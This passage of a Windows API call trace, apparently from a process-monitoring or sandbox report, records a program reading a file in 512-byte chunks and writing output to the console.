0x50 [0163.006] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] GetFileType (hFile=0x50) returned 0x1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] GetFileType (hFile=0x50) returned 0x1 [0163.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.007] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.007] GetFileType (hFile=0x50) returned 0x1 [0163.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.007] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.007] GetFileType (hFile=0x50) returned 0x1 [0163.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.007] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.007] GetFileType (hFile=0x50) returned 0x1 [0163.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.007] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0163.007] _get_osfhandle (_FileHandle=4) returned 0x58 [0163.007] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0163.007] _get_osfhandle (_FileHandle=4) returned 0x58 [0163.007] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.007] GetFileType (hFile=0x50) returned 0x1 [0163.007] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.008] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.008] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.008] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.008] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.008] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.008] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.008] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.008] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.008] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.009] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.010] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.011] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.012] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.012] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.012] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.012] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.012] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.012] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.012] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.012] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.012] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.013] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.014] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.015] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.016] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, 